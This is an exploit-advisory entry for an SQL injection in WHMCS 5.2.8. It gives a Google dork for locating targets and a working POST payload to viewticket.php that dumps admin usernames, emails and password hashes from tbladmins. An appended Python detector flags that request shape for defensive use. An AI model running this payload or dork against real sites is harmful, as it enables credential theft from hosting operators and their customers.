WHMCS 5.2.8 – SQL Injection Vulnerability

2014-02-11T00:00:00
ID MYHACK58:62201442320
Type myhack58
Reporter Anonymous
Modified 2014-02-11T00:00:00

Description

Google Dork: "powered by WHMCS"

Exploit Author: g00n ( Xploiter.net )

Vendor Homepage: http://www.whmcs.com/

Software Link: http://www.whmcs.com/

Version: 5.2.8

Tested on: Windows, Linux

Vulnerable file: /includes/dbfunctions.php

POC:

The select_query() function is vulnerable because of Register Globals: a request parameter can be supplied as an array, as in the example below.

Example:

/whmcs/viewticket.php

POST: tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,(SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins),0,0,0,0,0,0,0,0,0,0,0#
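
A defensive check for the request shape in the PoC, as an added example that is not part of the original advisory: it flags form bodies in which a parameter arrives as a PHP-style array carrying a `sqltype` key, which a normal client has no reason to send. The function name, the sample bodies and the SQL keyword pattern are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl

# PHP-style array parameter name: base[key][key]...
ARRAY_NAME = re.compile(r"^([^\[\]]+)((?:\[[^\[\]]*\])+)$")
SUBKEY = re.compile(r"\[([^\[\]]*)\]")
# SQL fragments that have no place in a ticket id or similar scalar field
# (illustrative pattern, not an exhaustive signature).
SQL_HINT = re.compile(r"union\s+(all\s+)?select|group_concat\s*\(", re.I)


def inspect_body(body):
    """Return (parameter, reason) findings for one urlencoded POST body."""
    findings = []
    for name, value in parse_qsl(body, keep_blank_values=True):
        m = ARRAY_NAME.match(name)
        if not m:
            continue  # scalar parameter, cannot carry a sqltype/value pair
        base = m.group(1)
        subkeys = [k.lower() for k in SUBKEY.findall(m.group(2))]
        if "sqltype" in subkeys:
            findings.append((base, "client-supplied sqltype"))
        elif "value" in subkeys and SQL_HINT.search(value):
            findings.append((base, "SQL keywords in array value"))
    return findings


# Constructed sample bodies (not captured traffic).
SAMPLES = {
    "normal ticket view": "tid=482913&c=Zk3PqLm2",
    "legitimate array field": "addons%5B%5D=3&addons%5B%5D=7",
    "array with sqltype": "tid%5Bsqltype%5D=TABLEJOIN&tid%5Bvalue%5D=-1+union+select+1",
}

if __name__ == "__main__":
    for label, body in SAMPLES.items():
        hits = inspect_body(body)
        print(f"{label}: {'ALERT ' + str(hits) if hits else 'ok'}")
```

The same test can run in a WAF rule or over logged POST bodies; it is a detection aid and does not replace upgrading the affected installation.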